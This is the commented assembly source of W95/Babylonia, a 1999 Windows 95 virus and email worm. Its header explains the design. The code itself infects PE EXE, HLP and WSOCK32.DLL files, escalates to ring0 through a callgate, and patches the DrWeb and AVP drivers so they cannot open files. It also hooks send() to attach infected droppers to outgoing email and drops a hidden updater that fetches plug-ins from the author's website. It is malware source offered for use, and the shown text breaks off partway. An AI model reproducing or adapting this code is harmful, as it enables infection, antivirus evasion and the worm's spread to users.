ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BABYLON.ASM]ÄÄÄ comment ^ W95/Babylonia.11036 - Set babylonia on fire! (c) Vecna 1999 I am of the opinion that asm talk by itself to the worthwhile reader, so, i will be brief... This virus is a memory resident ring0/ring3 virus, infecting PE EXE files, HLP files, and WSOCK32.DLL. The virus use EPO features, but no encryption or poly at all, altought it can be updated via WWW. ;) For much time, peoples where thinking about a virus upgradeable. Some attemps where made, as W95/SK, that was able to run special preparated data in RAR files. But how far the upgrade RAR packet can go? In this virus, i show my implementation of a plugin format, with the modules(plug-ins) online at a a WWW page. The virus is also a advanced email worm, attaching itself to all outgoing e-mails(no sending a new one as happy99), can deal with attachments already in e-mail body, have BASE64 and uu-encode routines, and, more important, the icon of the infected dropper sended by email change with the current date. When a infected app(or dropper) is executed, the virus dont get control at this moment. The virus patch a JMP or CALL, and wait be called. When this happen, the virus load some APIs from KERNEL32.DLL memory image(using CRC32), then jump to ring0 using a callgate. The infamous DESCRIPTOR 0 is used to store the temporary data, breaking the pmode tabu ;) While in ring0, the virus alloc some memory, and install a hook in IFS handler and wait for access to PE EXE files, HLP files, and WSOCK32.DLL. The memory is also scanned for presence of SPIDER.VXD(DrWeb) and AVP.VXD(Z0MBiE's lib). If they're found, their code is patched in a way that it lose the ability of open files. After returning control to the host, if the virus has just installed memory resident, it drop the www updater to disk and spawn it. More about the www updater below. PE files when accessed are infected by having the virus appended to last section, or overwrited if is was relocs, and with the CODE sections scanned for a suitable place for a CALL VIRUS. HLP files have added a script that pass control immediatly to virus code by using the callback features of the API of USER32 EnumWindows(). When WSOCK32.DLL is accessed, the send() export is redirected to a chunk of code in top of relocation info. This code get a ring0 memory pointer to the new send() handler, by new added functionality to the GetFileAttibute() API ;) The code in new send() scan the outgoing data by e-mail info, and add a infected dropper at the end of it. The virus support both MIME and non-MIME email clients, and can add the dropper in both uu-encoded and BASE64 format. The icon of this dropper change together with the name, to reflect some dates. All data carried with the virus is compressed using aPLib v0.22b library. I change my old LZW scheme by this routines due the immense gain in speed, compressed size, and code size. Is the same algorithm i used in Fabi.9608. When the www updater is executed, it register itself, with the fake name of KERNEL32.EXE, in registry, to run always, and copy itself to /winsys directory to avoid easy detection. The updater hide himself in the CTRL+ALT+DEL task list, and stay in background waiting for the user connect to the internet. Always in background, without any user notice, the www updater then connect to my www page, download the virus plug-ins(that have a special format, and can be expanded, to have full compatibility with future versions). If these modules complain with the version and features requeried to run, it is executed. The power of this is obvious. By adding new plugins, i can make the virus a irc-worm, infect remote drives, or even a poly engine. The problem of the possible take down of my URL is bypassed with the smart use of forwarders (not implemented in the public source version of the updater). The first module online are the greetz to the peoples that helped me in this virus, be with betatesting, be with ideas, be with moral support. Currently i am working in new modules, with new ideas that i think will be worth of be coded. If you arent a d0rk, you can contact me at vecna_br@hotmail.com, but idiot questions about how compile and like will be ignored... and your soul can be lost in the attempt of contact me ;) Questions about where's the entrypoint will be ignored too... ;> ^ .586p .model flat locals ofs equ offset by equ byte ptr wo equ word ptr dwo equ dword ptr fwo equ fword ptr TRUE EQU 1 FALSE EQU 0 include host.inc _VIRUS segment dword use32 public 'KMARAI' vcode equ this byte DEBUG equ FALSE ;debug version? DROPPER_SIZE equ 6144 ENTRY_READ equ 128 SKIP_FIRST equ 16 CRLF equ <13,10> CRC_POLY equ 0EDB88320h CRC_INIT equ 0FFFFFFFFh crc macro string ;jp/lapse macro .radix 16d crcReg = CRC_INIT irpc _x, ctrlByte = '&_x&' xor (crcReg and 0ff) crcReg = crcReg shr 8 rept 8 ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1)) endm crcReg = crcReg xor ctrlByte endm dd crcReg .radix 10d endm _gdt struc limit dw ? base dd ? _gdt ends _descriptor struc limit_l dw ? base_l dw ? base_m db ? access db ? limit_h db ? base_h db ? _descriptor ends _jmpfar struc jmpofs32 dd ? selectr dw ? _jmpfar ends _callback struc offset_l dw ? selector dw ? attrib dw ? offset_h dw ? _callback ends wsize2 equ 260 hook proc db 0e9h i_jmp dd 0 ;HLP redirector hlp_start = ofs virusmain-$ enter 20h, 0 ;setup stack frame push ecx push ebx mov ebx, [ebp+0Ch] cmp bl, 33 ;hookz ifs_attr je @@jmpcc cmp bl, 36 ;hookz ifs_open je @@jmpcc cmp bl, 37 ;hookz ifs_ren @@jmpcc: jmpcc equ by $ jne @@noopen ;beware! near form of jnz mov ebx, ebp pusha call delta mov wo [ebp+(ofs jmpcc-ofs vcode)], 0e990h add esp, -wsize2 mov edi, esp mov eax, [ebx+10h] inc al jz @@nodrive sub ax, -(":@"-1) stosw @@nodrive: push 0 ;BCS_WANSI push 255 mov eax, [ebx+1ch] mov eax, [eax+0ch] inc eax inc eax inc eax inc eax push eax push edi push 400041h ;VxDCall UniToBCSPath call vxd add esp, 16 dec edi ;edi=start of name dec edi lea esi, [edi+eax-2] mov eax, [esi] not eax cmp eax, not '---.' jne @@no_special cmp wo [esi-10], '_\' jne @@no_special ;trying to access the backdoor? cmp dwo [ebx+0ch], 33 ;file attr? jne @@no_special mov wo [ebp+(ofs backdoor-ofs vcode)], 9090h ;wsock32.dll is calling us @@no_special: IF DEBUG EQ TRUE cmp [esi-4], 'TAOG' jne @@shit ENDIF xor eax, not 'EXE.' ;esi=extension jnz @@try_hlp doshdr equ 0 peptr equ 3ch pehdr equ doshdr+40h cbfr equ pehdr+0f8h sectn equ cbfr+100h fsize equ sectn+200h epraw equ fsize+4 vrva equ epraw+4 lolimit equ vrva+4 uplimit equ lolimit+4 wsize4 equ uplimit+4 add esp, -wsize4 ;infect PE EXE files... mov esi, edi call open jc @@err call getsize mov [esp+fsize], eax cmp eax, DROPPER_SIZE ;my babies get better treatment je @@dropper call check_size jz @@err1 @@dropper: mov esi, esp push 40h pop ecx sub edx, edx call read ;read 40h of header xor eax, ecx jnz @@err1 movzx eax, wo [esi] not eax sub eax, not 'ZM' ;make sure is a EXE jnz @@err1 cmp wo [esi+18h], 40h jb @@err1 add cl, 0f8h-40h sub esi, -peptr lodsd xchg eax, edx call read jc @@err1 call check_file ;already infected? jz @@err1 movzx eax, wo [esi+22] test eax, 0102h jz @@err1 test eax, 3000h ;executable/no dll jnz @@err1 movzx ecx, wo [esi+6] cmp cl, 3 jb @@err1 ;too few sections push 0f8h imul ecx, ecx, 40 pop edx add edx, [esp+peptr] lea esi, [esp+sectn] call read ;read section table sub edi, edi xchg edi, ecx mov eax, [esp+pehdr+40] sub eax, [esi+12] cmp eax, [esi+8] ;entrypoint in first section? ja @@err1 add eax, [esi+20] ;raw ofs of entrycode mov [esp+epraw], eax mov eax, [esi+36] bts eax, 31 ;make 1st sec +write jc @@err1 ;and exit if already is bt eax, 5 jnc @@err1 ;need be CODE test eax, 10000000h+80h+40h jnz @@err1 ;cant be SHARED or UDATA/DATA mov [esi+36], eax mov eax, [esi+12] mov [esp+lolimit], eax add eax, [esi+8] mov [esp+uplimit], eax ;boundaries of .code section mov ebx, -(ofs vend-ofs vcode) sub ecx, ebx mov eax, [esp+pehdr+160] sub eax, [esi+edi-40+12] jnz @@increase ;last section isnt relocs mov eax, [esi+edi-40+16] add eax, ebx jnb @@increase ;relocs too small sub eax, eax mov edx, eax add eax, [esi+edi-40+12] ;rva of start of our code mov [esp+vrva], eax add edx, [esi+edi-40+20] jmp @@write @@increase: mov eax, [esi+edi-40+8] mov edx, eax add eax, [esi+edi-40+12] add edx, [esi+edi-40+20] mov [esp+vrva], eax ;rva of start of our code sub [esi+edi-40+8], ebx mov eax, [esi+edi-40+16] sub eax, ebx ;increase last section mov ebx, [esp+pehdr+60] dec ebx add eax, ebx not ebx and eax, ebx ;align raw section size mov [esi+edi-40+16], eax @@write: mov dwo [esi+edi-40+36], 0c0000040h sub dwo [esp+vrva], -(ofs virusmain-ofs vcode) add esi, edi add esi, (-40+8) lodsd xchg ebx, eax lodsd add ebx, eax ;rva+size mov eax, [esp+pehdr+56] dec eax add ebx, eax not eax and ebx, eax ;align it mov [esp+pehdr+80], ebx ;update imagesize mov esi, ebp pusha mov edx, [esp+epraw+((8*4))] push ENTRY_READ lea esi, [esp+cbfr+(8*4)+4] pop ecx call read ;read entrycode pusha push SKIP_FIRST pop eax add esi, eax ;skip first bytes(antiAV) sub ecx, eax @@jmp_call: lodsb cmp al, 0e8h ;call je @@found cmp al, 0e9h ;jmp je @@found @@loop1: loop @@jmp_call mov edi, [esp+(1*4)] ;put CALL at start push 5 pop esi jmp @@calculate @@found: mov edi, esi lodsd ;displacement mov edx, esi sub esi, [esp+(1*4)] ;turn to distance add eax, esi add eax, [esp+pehdr+40+(16*4)] ;add entrypoint(our base) cmp eax, [esp+lolimit+(16*4)] jb @@out cmp eax, [esp+uplimit+(16*4)] ;valid call? jb @@fine @@out: sub ecx, 4 mov esi, edx jmp @@loop1 @@fine: dec edi @@calculate: push esi mov esi, edi lodsb not eax mov by [ebp+(ofs instr1-ofs vcode)], al ;save modificated code lodsd not eax mov [ebp+(ofs instr2-ofs vcode)], eax pop ecx add ecx, [esp+pehdr+40+(16*4)] ;add entrypoint mov al, 0e8h stosb mov eax, [esp+vrva+(16*4)] ;our rva sub eax, ecx stosd ;build call to it popa call write ;write entrycode popa call write ;write virus body sub edx, edx push 0f8h lea esi, [esp+peptr+4] lodsd pop ecx xchg edx, eax bts wo [esi+22], 0 mov [esi+160], eax ;strip relocs mov [esi+164], eax call write ;write old header add edx, eax movzx ecx, wo [esi+6] imul ecx, ecx, 40 sub esi, -(sectn-pehdr) call write ;write section table @@err1: call close @@err: add esp, wsize4 @@try_hlp: xor eax, not 'PLH.' xor not 'EXE.' jnz @@wsockdll buffer equ 0 ;stack frame old_ofs equ 4 old_sz equ 8 patch1 equ 12 wsize3 equ 16 mainhdr equ 0 ;buffer structure pagedir equ 10h syshdr equ 210h build equ 225h add esp, -wsize3 ;infect HLP files... mov esi, edi call open jc @@error000 push 32*1024 push 040000dh ;getheap call vxd pop ecx mov [esp+buffer], eax mov esi, eax ;esi=buffer.mainhdr push 10h pop ecx sub edx, edx call read ;read 10h of header jc @@free lodsd xor eax, 035f3fh ;hlp signature? jnz @@free lodsd lea edx, [eax+37h] ;edx=directory offset mov ecx, 200h lodsd lodsd ;esi=buffer.pagedir call read mov ecx, eax @@search: dec ecx jz @@free cmp dwo [esi+ecx], 'SYS|' jnz @@search cmp dwo [esi+ecx+4], 'MET' jnz @@search mov eax, [esi-4] ;eax=end of file xchg eax, [esi+ecx+8] ;section code = end of file xchg eax, edx push 15h push 15h sub esi, -(syshdr-pagedir) pop ecx call read ;read sys hdr mov ecx, [esi] pop eax sub ecx, eax add edx, eax mov [esp+old_ofs], edx mov [esp+old_sz], ecx ;save old code position/size mov edi, [esp.buffer] sub edi, -build lea esi, [ebp+(ofs hlp1_s-ofs vcode)] lea eax, [edi+(ofs _size-ofs hlp1_s)] mov [esp.patch1], eax push hlp1_sz pop ecx @@decr: lodsb ;copy start macro not al stosb loop @@decr push edi ;edi=buffer mov dwo [ebp+(ofs i_jmp-ofs vcode)], hlp_start lea esi, [ebp+(ofs vend-ofs vcode)] @@next: add esi, -4 mov eax, [esi] call check test edx, edx ;can make it directly? jnz @@ext mov al, 12h ;push ? org $-1 push 12345678h org $-4 stosb mov eax, [esi] stosd jmp @@done_ @@ext: mov al, 0b8h ;mov eax, ? stosb mov eax, [esi] xor eax, edx stosd mov al, 35h ;xor eax, ? stosb mov eax, edx stosd mov al, 50h ;push eax stosb @@done_: cmp esi, ebp jne @@next pop eax mov ecx, edi sub ecx, eax ;ecx=poly code sub eax, eax mov dwo [esi+(ofs i_jmp-ofs vcode)], eax push ecx add ecx, (ofs hlp1_e-ofs p1)+(ofs hlp2_e-ofs hlp1_e) mov eax, [esp.patch1+4] mov wo [eax], cx ;patch macro size sub esi, -(ofs hlp1_e-ofs vcode) push hlp2_sz pop ecx rep movsb ;copy end macro pop eax mov esi, [esp.buffer] sub esi, -syshdr add eax, hlp2_e-hlp1_s add [esi], eax add [esi+4], eax ;fix syshdr size mov esi, edi mov edx, [esp.old_ofs] mov ecx, [esp.old_sz] sub eax, ecx ;old script too large? jbe @@free call read ;read old code cmp [esi+4], "`(RR" je @@free ;probably already infected mov ebp, [esp.buffer] ;ebp=buffer lea ecx, [edi+eax] sub ecx, ebp ;ecx=our size add ecx, -syshdr mov edx, [ebp.mainhdr+12] lea esi, [ebp.syshdr] call write ;write our code mov esi, [esp.buffer] push 10h add [esi.mainhdr+12], eax sub edx, edx pop ecx call write ;write main header mov edx, [esi.mainhdr+4] sub edx, -37h mov ecx, 200h add esi, pagedir call write ;write directory @@free: push dwo [esp+buffer] push 040000eh ;freeheap call vxd pop eax call close ;close file @@error000: add esp, wsize3 @@wsockdll: ; xor eax, not 'EXE.' xor not 'PLH.' xor not 'LLD.' xor eax, 01c000c00h jnz @@shit IF DEBUG EQ FALSE mov eax, [esi-4] mov esi, [esi-8] not eax xchg eax, esi not eax cmp esi, not '23KC' jne @@shit cmp eax, not 'OSW\' jne @@shit ENDIF obufer equ 0 ;stack frame header equ obufer+3ch pe_hdr equ header+4 section equ pe_hdr+0f8h export equ section+200h vofs equ export+4 vraw equ vofs+4 etable equ vraw+4 wsize1 equ etable+(4*20) add esp, -wsize1 ;patch WSOCK32.DLL... mov esi, edi call open jc @@error0 call getsize mov edi, eax call check_size jz @@error1 sub edx, edx mov ecx, 40h lea esi, [esp+obufer] call read cmp wo [esp+obufer], 'ZM' jne @@error1 push 0f8h pop ecx mov edx, [esp+header] cmp edx, edi jae @@error1 ;point outside of the file? lea esi, [esp+pe_hdr] call read jc @@error1 call check_file jz @@error1 call write ;write pe header add edx, eax movzx ecx, wo [esi+6] push ecx imul ecx, ecx, 40 lea esi, [esp+section+4] call read ;read section table pop ecx @@writeable: bts dwo [esi+36], 31 ;make all sections writeable sub esi, -40 loop @@writeable mov [esi-40+36], 0c0000040h mov ecx, [esi-40+8] ;increase last section push ecx add ecx, [esi-40+20] mov [esp+vraw+4], ecx ;raw of our patch pop ecx add ecx, [esi-40+12] mov [esp+vofs], ecx ;rva of our patch add dwo [esi-40+8], (ofs pend-ofs pstart) mov ebx, [esi-40+8] cmp ebx, [esi-40+16] jbe @@fit mov ecx, [esp+pe_hdr+60] dec ecx add ebx, ecx not ecx and ebx, ecx mov [esi-40+16], ebx ;align @@fit: xchg eax, ecx lea esi, [esp+section] call write mov eax, [esp+pe_hdr+120] ;eax=export table call rva2raw xchg eax, edx push 4 pop ecx sub edx, -28 lea esi, [esp+export] call read ;read export table addresses mov eax, [esi] call rva2raw xchg eax, edx push (4*20) pop ecx lea esi, [esp+etable] ;read 20 exports call read mov eax, [esp+vofs] mov edi, [esp+pe_hdr+52] ;wsock32 base sub eax, -(ofs send-ofs pstart) xchg [esi+(4*18)], eax ;hook send add edi, eax mov [ebp+(ofs oldsend-ofs vcode)], edi mov [ebp+(ofs _send-ofs vcode)], edi call write mov edx, [esp+vraw] push (ofs pend-ofs pstart) pop ecx call delta sub ebp, -(ofs pstart-ofs vcode) xchg esi, ebp call write ;write our patch @@error1: call close @@error0: add esp, wsize1 @@shit: add esp, wsize2 ;release tmp buffer mov wo [ebp+(ofs jmpcc-ofs vcode)], 0850fh popa @@noopen: push 6 push 1Ch pop ebx pop ecx ;total=6 paramz @@nparam: mov eax, [ebp+ebx] ;copy paramz from old frame push eax ;to new frame add ebx, -4 loop @@nparam db 0b8h ;mov eax, ? oldhook dd 0 call [eax] ;call old hookz add esp, 6*4 backdoor equ $ jmp @@closed call @@delta @@delta: pop ecx add ecx, (ofs my_send-ofs @@delta) mov wo [ecx-(ofs my_send-ofs backdoor)], ((ofs @@closed-(ofs backdoor+2))*100h)+0ebh mov ebx, [ebp+1ch] ;ioreq push esi mov esi, [ebx+14h] lodsd ;c:\_ sub eax, eax mov ebx, eax @@byte: lodsb ;get filename char inc ah sub al, 'A' or bl, al ;build address cmp ah, 8 je @@doneb shl ebx, 4 jmp @@byte @@doneb: mov [ebx], ecx ;patch requested address pop esi @@closed: pop ebx pop ecx leave ret hook endp delta proc call @@delta @@delta: pop ebp add ebp, -(ofs @@delta-ofs vcode) ret delta endp check_file proc mov eax, [esi] not eax cmp eax, not 'EP' jne @@error cmp wo [esi+4], 14ch ;386 jb @@error cmp wo [esi+4], 14eh ;586 ja @@error xor eax, edx ;(not('PE')xor(pe_ofs)xor(entry)) bswap eax xor eax, [esi+40] cmp [esi+8], eax ;infected? mov [esi+8], eax db 066h, 0b8h ;mov ax, ? @@error: sub eax, eax ret check_file endp gdt equ 0 idt equ 6 ring0_cs equ 12 ring0_ds equ 16 jmpfar equ 20 wsize equ 26 kernel32 equ 0bff70000h virusmain proc pushf pusha add esp, -wsize cld sub eax, eax call @@seh mov esp, [esp+8] ;hmm... SEH... :/ jmp @@installed @@seh: push dwo fs:[eax] mov fs:[eax], esp mov esi, [kernel32+80h+120] ;get kernel32 APIs... mov esi, [esi] sub esi, -(kernel32+24) ;esi=export directory+24 lodsd push eax lodsd push eax lodsd xchg ebx, eax pop ebp ;ebp=RVA table pop ecx ;ecx=number of names lodsd xchg esi, eax ;esi=names table xchg esi, ebx ;ebx=ordinal table mov edx, -kernel32 sub esi, edx sub ebp, edx sub ebx, edx ;edx=-kernel32 sub edi, edi @@loopy: inc edi ;edi=ordinal counter lodsd ;eax=API name string pusha sub eax, edx xchg eax, esi push CRC_INIT ;calculate crc of string pop ecx @@next_byte: lodsb test al, al jz @@done xor cl, al mov al, 8 @@next_bit: shr ecx, 1 jnc @@poly xor ecx, CRC_POLY @@poly: dec al jnz @@next_bit jmp @@next_byte @@done: call @@delta1 @@delta1: pop esi add esi, (ofs _openfile-ofs @@delta1) cmp ecx, 12345678h ;crcz of API org $-4 crc je @@patch_api sub esi, -((ofs _getfattr-ofs vcode)-(ofs _openfile-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _writefile-ofs vcode)-(ofs _getfattr-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, ((ofs _closehandle-ofs vcode)-(ofs _writefile-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _seekfile-ofs vcode)-(ofs _closehandle-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _loadl-ofs vcode)-(ofs _seekfile-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _freel-ofs vcode)-(ofs _loadl-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _getproc-ofs vcode)-(ofs _freel-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _gsystime-ofs vcode)-(ofs _getproc-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _fdelete-ofs vcode)-(ofs _gsystime-ofs vcode)) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _readfile-ofs vcode)-(ofs _fdelete-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api add esi, (ofs _getmhandle-ofs vcode)-(ofs _readfile-ofs vcode) cmp ecx, 12345678h org $-4 crc je @@patch_api sub esi, -((ofs _winexec-ofs vcode)-(ofs _getmhandle-ofs vcode)) cmp ecx, 12345678h org $-4 crc jne @@end_loopy @@patch_api: movzx eax, wo [ebx+(edi*2)] ;get ordinal dec eax mov eax, [ebp+(eax*4)] ;get rva sub eax, edx mov [esi], eax ;got it! @@end_loopy: popa dec ecx jnz @@loopy ;all APIs scanned call delta lea eax, [ebp+(ofs wsock-ofs vcode)] push eax db 0b8h _loadl dd 0 call eax ;load wsock32.dll xchg eax, ecx jecxz @@suxx push ecx ;for FreeLibrary call @@send db 'send', 0 @@send: push ecx db 0b8h+7 ;GetProcAddress _getproc dd 0 call edi cmp by [eax], 0e8h ;the difference between masters jne @@isnt ;and pupils ;) cmp by [eax+5], 0b8h jne @@isnt mov eax, [eax+6] ;get real addy :) @@isnt: mov [ebp+(ofs oldsend-ofs vcode)], eax db 0b8h _freel dd 0 call eax @@suxx: push 8 push ebp pop esi push (ofs vend-ofs vcode)/4 ;make sure we're commited pop ecx rep lodsd pop eax lea edi, [ebp+(ofs myname-ofs vcode)] xchg eax, ecx rep stosd mov ebp, esp ;jmp2ring0... push 1 sgdt [ebp+gdt] ;get global descriptor table sidt [ebp+idt] ;get interrupt table mov esi, [ebp+gdt.base] mov edi, esi movzx ecx, wo [ebp+gdt.limit] pop ebx @@search_gdt: sub eax, eax cmp wo [esi.limit_l], 0ffffh jne @@next_descriptor cmp by [esi.limit_h], 0cfh ;descriptor start at 0? jne @@next_descriptor cmp wo [esi.base_l], ax ;and cover the whole range? jne @@next_descriptor cmp by [esi.base_m], al jne @@next_descriptor cmp by [esi.base_h], al jne @@next_descriptor ;is a flat descriptor! cmp [esi.access], 9bh jne @@no_code ;is a code descriptor? mov eax, esi sub eax, [ebp+gdt.base] mov [ebp+ring0_cs], eax ;yes, save it! shl ebx, 1 jmp @@next_descriptor @@no_code: cmp [esi.access], 93h jne @@next_descriptor ;is a data descriptor? mov eax, esi sub eax, [ebp+gdt.base] mov [ebp+ring0_ds], eax ;yes, save it! shl ebx, 1 @@next_descriptor: lodsd lodsd bt ebx, 2 ;our 2 descriptors found? jc @@search_done loop @@search_gdt jmp @@installed ;flat descriptors dont found @@search_done: mov esi, edi ;esi=1st entry lodsd ;edi=nul entry lodsd test eax, eax ;nul entry isnt empty? jnz @@installed ;then already resident pusha movsd movsd ;backup 1st descriptor popa mov eax, dwo [ebp+ring0_cs] mov wo [esi.selector], ax ;ring0 code selector mov wo [esi.attrib], 0ec00h call @@over_ring0_code ;[esp]=ring0 code @@ring0_code: mov ds, ax mov es, ax ;setup data access xchg esi, edi movsd ;restore 1st descriptor movsd mov edi, ebp mov ebx, [edi.gdt.base] movzx ecx, wo [edi.gdt.limit] call protect ;make gdt read only mov ebx, [edi.idt.base] movzx ecx, wo [edi.idt.limit] call protect ;make idt read only push 00270005h call vxd ;VXDLDR GetDeviceList @@next: mov ebx, [eax+5] ;VxD_Desc_Block *DI_DDB sub ebx, 0C0000000h jc @@next_vxd lea ecx, [ebx+0C000000Ch] ;Name_0 cmp [ecx], 'DIPS' ;'SPIDER ' je @@patch cmp [ecx], '9PVA' ;'AVP95 ' jne @@next_vxd @@patch: push 0000D500h ;R0_OPENCREATFILE pop esi call ScanVxd inc esi ;R0_OPENCREAT_IN_CONTEXT call ScanVxd @@next_vxd: mov eax, [eax] or eax, eax jnz @@next push 9 push eax push eax push eax push eax push eax push 1 push 64/4 ;memory for email shitz push 010053h call vxd add esp, 8*4 test eax, eax jz @@fucked mov [ebp+(ofs mem_temp-ofs vcode)], eax @@fucked: push (ofs vend-ofs vcode) push 9 push eax push eax push eax push eax push eax push 1 push (((ofs vend-ofs vcode)+4095)/4096) push 010053h ;PageAlloc call vxd add esp, 8*4 test eax, eax jz @@fuck mov edi, eax xchg eax, ecx xchg ecx, [esp] ;pop size/push &hook push ebp pop esi rep movsb mov [edi+(ofs i_jmp-ofs vcode)-(ofs vend-ofs vcode)], ecx mov [edi+(ofs socket_out-ofs vcode)-(ofs vend-ofs vcode)], ecx mov wo [edi+(ofs jmpcc-ofs vcode)-(ofs vend-ofs vcode)], 0850fh push 00400067h ;install ifs hook call vxd mov [edi+(ofs oldhook-ofs vcode)-(ofs vend-ofs vcode)], eax @@fuck: pop eax retf @@over_ring0_code: pop eax mov ebx, eax shr eax, 16 mov wo [esi.offset_l], bx ;address of routine mov wo [esi.offset_h], ax push 0 pop dwo [ebp+jmpfar.jmpofs32] mov wo [ebp+jmpfar.selectr], 8 ;jmp to callback 1 mov eax, dwo [ebp+ring0_ds] ;set ring0 data push ds push es cli call fwo [ebp+jmpfar] ;call our ring0 code cli pop es pop ds @@installed: sub eax, eax pop dwo fs:[eax] ;remove SEH pop ecx call delta mov eax, [ebp+(ofs mem_temp-ofs vcode)] test eax, eax jz @@no_ready push eax call @@over include updater.inc @@over: call _aP_depack_asm ;unpack updater data push eax push 2 pop ecx lea esi, [ebp+(ofs dropname-ofs vcode)] call r3_open pop ecx jz @@no_ready mov esi, [ebp+(ofs mem_temp-ofs vcode)] call r3_write call r3_close push 0 lea eax, [ebp+(ofs dropname-ofs vcode)] push eax db 0b8h _winexec dd 0 call eax @@no_ready: cmp dwo [ebp+(ofs i_jmp-ofs vcode)], 0 je @@pe_exe add esp, wsize popa popf add esp, (ofs vend-ofs vcode) sub eax, eax ;stop enumeration ret 8 ;return to callback @@pe_exe: lea eax, [esp+wsize+(9*4)] mov edi, [eax] sub edi, 5 ;return place mov [eax], edi mov al, not 0b8h instr1 equ by $-1 not eax stosb mov eax, 12345678h instr2 equ dwo $-4 not eax stosd add esp, wsize popa popf ret ;return to same place! virusmain endp hlp1_s = $ dw 4 dw (ofs _label1-ofs _label2) _label2 = $ db "RR(`USER32.DLL',`EnumWindows',`SU')", 0 _label1 = $ dw 4 _size dw 0 p1 = $ db "EnumWindows(`" hlp1_e = $ hlp1_sz = hlp1_e-hlp1_s jmp esp db "',666)", 0 ;29A hlp2_e = $ hlp2_sz = hlp2_e-hlp1_e check proc call checkv jc @@again_1 sub edx, edx ret @@again_1: mov ebx, eax @@again: mov eax, ebx call rnd xor eax, edx call checkv ;eax was validated? jc @@again xchg eax, edx ;edx is valid modifier? call checkv jc @@again xchg edx, eax ret check endp rnd proc call @@2 dd 12345678h @@2: pop edx sub [edx], 12345678h org $-4 v2 dd 87654321h mov edx, [edx] xor [ebp+(ofs v2-ofs vcode)], edx ;get rnd number ret rnd endp checkv proc pusha push 4 pop ecx @@1: cmp al, ' ' jbe @@error cmp al, 0f0h ja @@error cmp al, '"' jz @@error cmp al, "'" jz @@error cmp al, "`" jz @@error cmp al, "\" jz @@error ror eax, 8 ;check for invalid characters loop @@1 ;for hlp script clc mov cl, 12h org $-1 @@error: stc popa ret checkv endp open proc call getatt mov [ebp+(ofs attr-ofs vcode)], eax sub ecx, ecx call setatt mov [ebp+(ofs fname-ofs vcode)], esi mov eax, 0D500h push 1h sub ecx, ecx mov ebx, 2022h pop edx call io mov [ebp+(ofs handle-ofs vcode)], eax ret open endp getsize proc mov eax, 0D800h __2_: jmp __2__ getsize endp close proc mov eax, 0D700h call __2_ mov ecx, 12345678h attr equ dwo $-4 mov esi, 12345678h fname equ dwo $-4 ;set old file attribute close endp setatt proc mov eax, 4301h __2__: jmp __2___ setatt endp getatt proc mov eax, 4300h __2___: jmp __2 getatt endp write proc mov eax, 0D601h jmp __2___ write endp read proc mov eax, 0D600h __2: mov ebx, 12345678h handle equ dwo $-4 read endp io proc call delta mov [ebp+(ofs eax_value-ofs vcode)], eax mov eax, 00400032h ;Ring0_IO xchg eax, [esp] push eax io endp vxd proc pop eax call delta mov wo [ebp+(ofs @@int-ofs vcode)], 20cdh sub eax, ebp add eax, -((ofs @@jmp-ofs vcode)+4) mov [ebp+(ofs @@jmp-ofs vcode)], eax pop dwo [ebp+(ofs @@address-ofs vcode)] ;dynamic VxDCall building mov eax, 12345678h eax_value equ dwo $-4 @@int: int 20h @@address dd 0 db 0e9h @@jmp dd 0 vxd endp bound_ db 'OUNDARY="' bound_sz = $-ofs bound_ db 0 rva2raw proc push esi push ecx push ebx lea esi, [esp+section+(4*4)] ;first section movzx ecx, wo [esp+pe_hdr+6+(4*4)] @@section: mov ebx, eax sub ebx, [esi+12] cmp [esi+8], ebx jae @@found ;point inside section sub esi, -40 loop @@section sub ebx, ebx ;signal error jmp @@error @@found: add ebx, [esi+20] ;convert to raw @@error: mov eax, ebx pop ebx pop ecx pop esi ret rva2raw endp check_size proc test eax, eax jz @@error cmp eax, 2*1024*1024 jae @@error ;bigger than 2mb cmp eax, 8*1024 jbe @@error ;smaller than 4kb sub edx, edx push 17 pop ecx ;if((fsize mod 17) = 15) div ecx ;lexo32 ;-) sub edx, 15 db 066h, 0b8h ;mov ax, ? @@error: sub eax, eax ret check_size endp pstart equ this byte ;wsock32.dll code... dd 0 db 'C:\_' driver db 8 dup (0) ;drivername db '.---', 0 send proc call init2 mov eax, 12345678h _send equ dwo $-4 jmp eax ;jmp to hmem send send endp init2 proc cld pusha call @@delta @@delta: pop ebp add ebp, -(ofs @@delta-ofs pstart) ;get delta in wsock32.dll mov ebx, ebp lea edi, [ebx+(ofs driver-ofs pstart)] push 8 pop ecx @@byte: rol ebx, 4 mov al, bl and al, 01111b ;convert address to filename add al, 'A' stosb loop @@byte add ebx, 4 push ebx db 0b8h _getfattr dd 0 ;call backdoor call eax mov eax, 90909090h lea edi, [ebp+((ofs send-ofs pstart))] stosd ;clean calls to install stosb mov eax, [ebp] ;get ring0 interface code test eax, eax jz @@damaged ;cant get the interface mov [ebp+(ofs _send-ofs pstart)], eax ;set jmps to my hmem handlers @@damaged: popa ret init2 endp pend equ this byte include unpack.inc ScanVxd proc pusha mov edi, [ebx+0C0000018h] ;Control_Proc_0 @@page: lea ecx, [edi+4] ;check presence for test ecx, 00000FFFh jz @@check ;to each new page encountered @@mov: inc edi cmp [edi], esi ;B8 jne @@page cmp by [edi-1], 0B8h jne @@page mov dwo [edi], -1 ;R0_xxx <-- 0xFFFFFFFF jmp @@page @@check: pusha sub esp, 28 mov esi, esp push 28 push esi ;esi = MEMORY_BASIC_INFO push ecx push 00010134h call vxd ;VMMcall PageQuery bt dwo [esi+10h], 3 ;mbi_state & MEM_COMMIT lea esp, [esp+4*3+28] popa jc @@mov ;will not fault? popa ret ScanVxd endp IF DEBUG EQ TRUE 